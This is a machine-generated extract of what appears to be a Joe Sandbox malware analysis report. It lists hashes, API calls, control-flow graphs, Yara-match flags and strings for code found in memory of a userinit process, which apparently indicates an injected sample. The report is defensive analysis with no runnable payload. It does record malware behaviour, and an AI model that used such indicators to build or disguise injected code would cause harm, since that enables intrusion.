                                                                • Instruction ID: 81f0fea1dab6c1d052ee77b177fc65b5619418195afab6440ba213b2afe9f8a3
                                                                • Opcode Fuzzy Hash: 46bc739af967718442d05418bde317b80dc344cb68a8e2ce7591e3e738844c7e
                                                                • Instruction Fuzzy Hash: A490023124140C52E100B2584484B86000687E0311F95C026A0124668D8715C9517523
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 23580bbe5d57265c6838eb815d41f2fceeaeb42744cf0e06d3aced7cc57ae01b
                                                                • Instruction ID: 5978dac7a7856e3ccb7f673c0fe2cecd6f7a663fc39f32d5ca1ecfae037b3200
                                                                • Opcode Fuzzy Hash: 23580bbe5d57265c6838eb815d41f2fceeaeb42744cf0e06d3aced7cc57ae01b
                                                                • Instruction Fuzzy Hash: 7F90023124140812E100B6985488686000687E0311F95D021A5024569EC76589916133
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 5d21c36e49239bd44e651e81a9e9b4873c14389e9fd38e8f46c6cc392d0ae26d
                                                                • Instruction ID: 598a9f711bbc988c4d73ab27d2a4cfc57ad91d81525b01bafd9b60d0d55cf482
                                                                • Opcode Fuzzy Hash: 5d21c36e49239bd44e651e81a9e9b4873c14389e9fd38e8f46c6cc392d0ae26d
                                                                • Instruction Fuzzy Hash: 3490023164550812E100B2584594746100687D0311FA5C421A042457CD87958A5165A3
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3325fa8378bdc598e4097615e6d3fe4f9088084718b92c9206a22ec662a298d2
                                                                • Instruction ID: ddde1d1d811e797d6f2b2adc35cbecdd6d4019858da708dd10ce2287fdfcfc37
                                                                • Opcode Fuzzy Hash: 3325fa8378bdc598e4097615e6d3fe4f9088084718b92c9206a22ec662a298d2
                                                                • Instruction Fuzzy Hash: 5690022128545512E150B25C44846564006A7E0311F95C031A08145A8D865589556223

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 03010A67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: A34E618M$A34E618M
                                                                • API String ID: 1836367815-3667986552
                                                                • Opcode ID: 9eb77fb9506519ee716a6be9551ba768d930a6305ecb25ebbeec0b418dc20f2b
                                                                • Instruction ID: 42b9f981959a70b4c6259d15141d71655a0412c6f00002e5141b0830909a7d2b
                                                                • Opcode Fuzzy Hash: 9eb77fb9506519ee716a6be9551ba768d930a6305ecb25ebbeec0b418dc20f2b
                                                                • Instruction Fuzzy Hash: 0511A0B6D0125C7EEB11DBE48C80DEF7F7CAB91694F058054FA04AB240D5284E068BA1

                                                                Control-flow Graph

                                                                control_flow_graph 567 30109f0-3010a02 568 3010a0a-3010a5a call 302bc60 call 30141d0 call 3001410 call 30218f0 567->568 569 3010a05 call 302b250 567->569 578 3010a7a-3010a80 568->578 579 3010a5c-3010a6b PostThreadMessageW 568->579 569->568 579->578 580 3010a6d-3010a77 579->580 580->578
                                                                APIs
                                                                • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 03010A67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: A34E618M$A34E618M
                                                                • API String ID: 1836367815-3667986552
                                                                • Opcode ID: 931d75ecbf4df0deef89f2b105e44bbb8c64937d61a1d688ec7fee3cadcddb57
                                                                • Instruction ID: 0ff9a71c1e365762af6046a8a240c3b0421fca17fa0c75b03fe2dd4282840a17
                                                                • Opcode Fuzzy Hash: 931d75ecbf4df0deef89f2b105e44bbb8c64937d61a1d688ec7fee3cadcddb57
                                                                • Instruction Fuzzy Hash: 2A0196B5D0125C7EDB10E6E58C81DEFBB7CEF91694F458064FA04BB140D5385E068BB1
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: 50885b1edb9e7b148e27d647e923dbd77f27874b4528f90006961c46233bcca0
                                                                • Instruction ID: 5e4adafe0782f7a1d61eafa4b18d3560dbbf3e3932c470d98749633507407020
                                                                • Opcode Fuzzy Hash: 50885b1edb9e7b148e27d647e923dbd77f27874b4528f90006961c46233bcca0
                                                                • Instruction Fuzzy Hash: 513121B5A0060A9FDB00DFD8DC809EFB7B9FF88304B148559E515EB214D775EE458BA0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: 6a81704b8de6bab05823ed953bb4463d50ac1888c863c694621acfd6ca484a67
                                                                • Instruction ID: 023c07061944f5442b7faf41969317dfd37b6f6eee45d5abaafcf0b89421679b
                                                                • Opcode Fuzzy Hash: 6a81704b8de6bab05823ed953bb4463d50ac1888c863c694621acfd6ca484a67
                                                                • Instruction Fuzzy Hash: D33110B5A0060A9FDB00DFD8D8809EFB7B9FF88304B148559E915EB214D775EE458BA0
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 0302386B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: wininet.dll
                                                                • API String ID: 3472027048-3354682871
                                                                • Opcode ID: 4b45296fbfd4f5e4a1577e27a01ce22409fcfd32aa0328a2f5837752b9ad7849
                                                                • Instruction ID: e4f11117d43bca9296296513816b0de9b4dd70c352c933b994f2f0fdeb901793
                                                                • Opcode Fuzzy Hash: 4b45296fbfd4f5e4a1577e27a01ce22409fcfd32aa0328a2f5837752b9ad7849
                                                                • Instruction Fuzzy Hash: 13315CB5A02705BBD714DFA4CC84FEBBBB8AB88710F444559EA196B240D7746A408BA4
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03014242
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                                • Instruction ID: efb160fed00f98aac2b2b647bfcd588d3343f5ca3613ee5e20467e39f01118d2
                                                                • Opcode Fuzzy Hash: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                                • Instruction Fuzzy Hash: FB419B31A06345ABDB10DFB9CC81FEABBB8DF46714F4806EAED448F152E6329415CB80
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03014242
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                                • Instruction ID: ec2f7065af9488c366e0466ca8c36712fc9fd247b5bd9e0bcd8a84de919cf32e
                                                                • Opcode Fuzzy Hash: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                                • Instruction Fuzzy Hash: 01015EB9E0120DABDF10EAE5DC41FDEB7B8AB44208F044195E9089B240F630EB58CB91
                                                                APIs
                                                                • CreateProcessInternalW.KERNELBASE(?,?,8BF2C41C,?,03017FEE,00000010,?,?,?,00000044,?,00000010,03017FEE,?,8BF2C41C,?), ref: 03029513
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateInternalProcess
                                                                • String ID:
                                                                • API String ID: 2186235152-0
                                                                • Opcode ID: 56a61c51a895dbc6affd52a1c766e14ac807e4eff9a711212e461f79b1ccc8aa
                                                                • Instruction ID: c881dab36bf64fb88ca1d2389205e575fefe5d99880bb5412b066b58a5ffb79b
                                                                • Opcode Fuzzy Hash: 56a61c51a895dbc6affd52a1c766e14ac807e4eff9a711212e461f79b1ccc8aa
                                                                • Instruction Fuzzy Hash: EA0180B6205608BBCB54DE99DC81EEB77ADAFCD754F418208BA19E7240D630FC518BA4
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009B35
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: b666ca78757feaef45e98809376a117604cb4ad09f8fed90e1b78c2a7cd5da3d
                                                                • Instruction ID: 6ad344e41cdee9311becae7cdc090dd62378944a6524bf06776134255a4189ed
                                                                • Opcode Fuzzy Hash: b666ca78757feaef45e98809376a117604cb4ad09f8fed90e1b78c2a7cd5da3d
                                                                • Instruction Fuzzy Hash: A2F0397739171436E220B5A99C02FEBB78C8B80A61F240429FA0CEA2C1D9A5B54182A4
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009B35
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: 8b0afc6a82cec3a2473c203f12133cbd19f44fefa4b433d70a40ff5cce6f215e
                                                                • Instruction ID: 323ef84dd616f9cc7dcb1a1a6c9f87c8e82b94b523171b9f579c32901e8c6005
                                                                • Opcode Fuzzy Hash: 8b0afc6a82cec3a2473c203f12133cbd19f44fefa4b433d70a40ff5cce6f215e
                                                                • Instruction Fuzzy Hash: 02F030762817103BE224B5A98C52FE7B69D9F81B65F280018FA09AF1C1DAA5B54186A4
                                                                APIs
                                                                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03028030
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Path$NameName_
                                                                • String ID:
                                                                • API String ID: 3514427675-0
                                                                • Opcode ID: c90d3ea079158c21ab9e1e75dc3446daa8ef4141d83060cbdcedb459303117ec
                                                                • Instruction ID: e8a8375eec0597f26596be26dd669629e31e8ab2fe551990635ce1726fae7a19
                                                                • Opcode Fuzzy Hash: c90d3ea079158c21ab9e1e75dc3446daa8ef4141d83060cbdcedb459303117ec
                                                                • Instruction Fuzzy Hash: 66F030B52002047BD614EE59DC80EDB77ADDFC9710F408009FD1997241CA30BD158BF5
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(03011689,?,03025CBB,03011689,0302539F,03025CBB,?,03011689,0302539F,00001000,?,?,00000000), ref: 0302940C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                                • Instruction ID: 3979ee6e40c8086a7538f9f0fe0e2b2b426a577082f5af0f2535db03d3498273
                                                                • Opcode Fuzzy Hash: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                                • Instruction Fuzzy Hash: ADE039B6200214BBD614EA58DC84EDB77ACDFC9750F404008B909AB241DA30B81087B9
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D70B08E2,00000007,00000000,00000004,00000000,03013A48,000000F4), ref: 0302945F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                                • Instruction ID: 62f03ef94c72cc2e03fc3282840071d06ab8a141f9da404acc17528353417574
                                                                • Opcode Fuzzy Hash: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                                • Instruction Fuzzy Hash: 66E06D752043047BD614EE98DC44FEB37ACDFC5710F404009FA09A7240D670BC1487B8
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0301805C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 2440bff3137740337088c3ece4f8469803b100dfab4f7cf16c8f6bfde92db598
                                                                • Instruction ID: 1edf53e48b1a1cf5c665a6376887dc3469e4c336fd6a9cd175a722fdbc84a6b5
                                                                • Opcode Fuzzy Hash: 2440bff3137740337088c3ece4f8469803b100dfab4f7cf16c8f6bfde92db598
                                                                • Instruction Fuzzy Hash: 7EE080751513081FFB64E568DC45F7633985B48A24F7C4550B91CDB1C1F579FA214150
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0301805C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: df5bfc7ebbd9ce0f358cd4c53087d5a895ddc15fac9fda3c5a16cb5a8b5a8fda
                                                                • Instruction ID: 8d91b3866318a50c3ebede9ba9e8be29547fb2a705476454aa131deb40ae9b6c
                                                                • Opcode Fuzzy Hash: df5bfc7ebbd9ce0f358cd4c53087d5a895ddc15fac9fda3c5a16cb5a8b5a8fda
                                                                • Instruction Fuzzy Hash: 22E026712113042FFB61A6788D867AE37685B44720F3C4A54F928AF0C3E97DE6324320
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03011990,03027CDF,0302539F,03011956), ref: 03017E53
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 9b94415c94796085445fa5cf7765cc542840a823db04e929f82b293c487896c3
                                                                • Instruction ID: 70e9faea079d7eb035d01a94f1678633670998b5ad5b36ef296905ed1666280a
                                                                • Opcode Fuzzy Hash: 9b94415c94796085445fa5cf7765cc542840a823db04e929f82b293c487896c3
                                                                • Instruction Fuzzy Hash: B2D02E792803083BF600F6A4CC12F6A32CC4B48A44F080024BA08EB2C2E914E1004260
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 809509ee8dc6b1df37724ff052a8fabbf3f7d4ff79946aa9a7c1b1c8a51c034f
                                                                • Instruction ID: 7a1e8db8cf40dd9052365ecdc09a0ffd9a1fab3846d9258643a6c45e3c04c330
                                                                • Opcode Fuzzy Hash: 809509ee8dc6b1df37724ff052a8fabbf3f7d4ff79946aa9a7c1b1c8a51c034f
                                                                • Instruction Fuzzy Hash: 22B02B719014C4C5EF00F3200608707390467D0300F19C471D3030241F0338C0C0E173
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3907348573.0000000003A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3a50000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05931bad407fad06c90276980eda770c1b279e7856ddd22cdd6d2d566640c38b
                                                                • Instruction ID: 65bb7b17aa3d0506ce88439ebd0ae26d7332235988434cf26ce09ea1c99e4d29
                                                                • Opcode Fuzzy Hash: 05931bad407fad06c90276980eda770c1b279e7856ddd22cdd6d2d566640c38b
                                                                • Instruction Fuzzy Hash: FE41E3B151DB094FD368EF6890816B6F3E2FB45300F54462EEDCAC3752EA74E8068785
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3907348573.0000000003A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3a50000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3754132690
                                                                • Opcode ID: e5645683453c96cd5def99579692e90bd932f7ee67e734a6f0ef01789537d29f
                                                                • Instruction ID: 3282d4330e917ba6451f058f5e9faa787593e1a7b1d46a2416d4f934a59426e3
                                                                • Opcode Fuzzy Hash: e5645683453c96cd5def99579692e90bd932f7ee67e734a6f0ef01789537d29f
                                                                • Instruction Fuzzy Hash: A8914EF04082988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3907348573.0000000003A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3a50000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -/OB$3/67$7R[:$BNJN$HLUH$I@[5$JMUJ$KUJB$M[S0$NUK[$OJ[6$OUOU$THNU$TNHL$UHM
                                                                • API String ID: 0-3939393268
                                                                • Opcode ID: 3df7bd082018e90712f34a75f073257b08e045aacf08472eff391d1352ce6ac2
                                                                • Instruction ID: 0dc03a641933d563042ddfd5dfeea4ac168badb54ebe9146a3580ba03754194d
                                                                • Opcode Fuzzy Hash: 3df7bd082018e90712f34a75f073257b08e045aacf08472eff391d1352ce6ac2
                                                                • Instruction Fuzzy Hash: 893132B490424CEBCF25CF84D190ADEBFB2FF00344F828159E92A6F248C7768655CB98
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 1481522924cd534278ed7d4c012b5e4c1c6f5810e78f494aae091d95cf0956f1
                                                                • Instruction ID: e480a961732b4b8cb3001394d4abb444067964e1a0326b1b36e0804f97dab589
                                                                • Opcode Fuzzy Hash: 1481522924cd534278ed7d4c012b5e4c1c6f5810e78f494aae091d95cf0956f1
                                                                • Instruction Fuzzy Hash: DD51E8B5A04616BFDF10DB9C889097EF7B8BB49200B188669E4B5E7642D334DE40DBA0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 1f7754a476a14a9ada4ac19dd61c0ec435b2b53c38beff3ae2bfd2b57a6237e1
                                                                • Instruction ID: 83699eb163f8a4ef8972be4eb0eed5392ee479f92c6cadb598add282d1d11e0b
                                                                • Opcode Fuzzy Hash: 1f7754a476a14a9ada4ac19dd61c0ec435b2b53c38beff3ae2bfd2b57a6237e1
                                                                • Instruction Fuzzy Hash: 6951EAB5A00655AEDB30EF5CC99097FB7FDEB48200B148899E4A6DB642D774EE40C760
                                                                Strings
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 037A4787
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 037A4725
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 037A4655
                                                                • ExecuteOptions, xrefs: 037A46A0
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037A46FC
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 037A4742
                                                                • Execute=1, xrefs: 037A4713
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: f943b6e58edb0edb6de8baf666e8885645c01d7588a8b47533165f795572f92a
                                                                • Instruction ID: 52fa20f1184d6cabc7c0fe26e937bfad1cf2fcc2db529c92f952adaca2c9ccb4
                                                                • Opcode Fuzzy Hash: f943b6e58edb0edb6de8baf666e8885645c01d7588a8b47533165f795572f92a
                                                                • Instruction Fuzzy Hash: B3512A75600359BADF24EAA9DC99FEE73B8EF44348F0401E9D905AB181E7719A418F50
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
